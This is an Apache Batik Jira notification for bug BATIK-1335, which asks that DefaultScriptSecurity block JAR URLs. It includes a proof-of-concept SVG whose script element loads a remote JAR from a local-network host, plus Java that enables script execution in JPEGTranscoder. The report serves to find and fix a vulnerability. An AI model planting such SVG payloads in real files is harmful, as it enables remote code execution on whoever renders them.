[ https://issues.apache.org/jira/browse/BATIK-1335?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]
Simon Steiner updated BATIK-1335: --------------------------------- Description: <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" width="450" height="500" viewBox="0 0 450 500"> <script type="application/java-archive" xlink:href="jar:http://192.168.1.10/poc.jar!/"></script> </svg> should be blocked when using: JPEGTranscoder t = new JPEGTranscoder(); t.addTranscodingHint(JPEGTranscoder.KEY_EXECUTE_ONLOAD, Boolean.TRUE); t.addTranscodingHint(JPEGTranscoder.KEY_ALLOWED_SCRIPT_TYPES, "application/java-archive,"); FileInputStream stream = new FileInputStream("test.svg"); TranscoderInput input = new TranscoderInput(stream); FileOutputStream fos = new FileOutputStream("out.jpg"); TranscoderOutput output = new TranscoderOutput(fos); t.transcode(input, output); fos.close(); was: JPEGTranscoder t = new JPEGTranscoder(); t.addTranscodingHint(JPEGTranscoder.KEY_EXECUTE_ONLOAD, Boolean.TRUE); t.addTranscodingHint(JPEGTranscoder.KEY_ALLOWED_SCRIPT_TYPES, "application/java-archive,"); FileInputStream stream = new FileInputStream("test.svg"); TranscoderInput input = new TranscoderInput(stream); FileOutputStream fos = new FileOutputStream("out.jpg"); TranscoderOutput output = new TranscoderOutput(fos); t.transcode(input, output); fos.close(); > Jar url should be blocked by DefaultScriptSecurity > -------------------------------------------------- > > Key: BATIK-1335 > URL: https://issues.apache.org/jira/browse/BATIK-1335 > Project: Batik > Issue Type: Bug > Reporter: Simon Steiner > Assignee: Simon Steiner > Priority: Major > > <svg xmlns="http://www.w3.org/2000/svg" > xmlns:xlink="http://www.w3.org/1999/xlink" width="450" height="500" > viewBox="0 0 450 500"> > <script type="application/java-archive" > xlink:href="jar:http://192.168.1.10/poc.jar!/"></script> > </svg> > should be blocked when using: > JPEGTranscoder t = new JPEGTranscoder(); > t.addTranscodingHint(JPEGTranscoder.KEY_EXECUTE_ONLOAD, Boolean.TRUE); > t.addTranscodingHint(JPEGTranscoder.KEY_ALLOWED_SCRIPT_TYPES, > "application/java-archive,"); > FileInputStream stream = new FileInputStream("test.svg"); > TranscoderInput input = new TranscoderInput(stream); > FileOutputStream fos = new FileOutputStream("out.jpg"); > TranscoderOutput output = new TranscoderOutput(fos); > t.transcode(input, output); > fos.close(); -- This message was sent by Atlassian Jira (v8.20.10#820010) --------------------------------------------------------------------- To unsubscribe, e-mail: batik-dev-unsubscr...@xmlgraphics.apache.org For additional commands, e-mail: batik-dev-h...@xmlgraphics.apache.org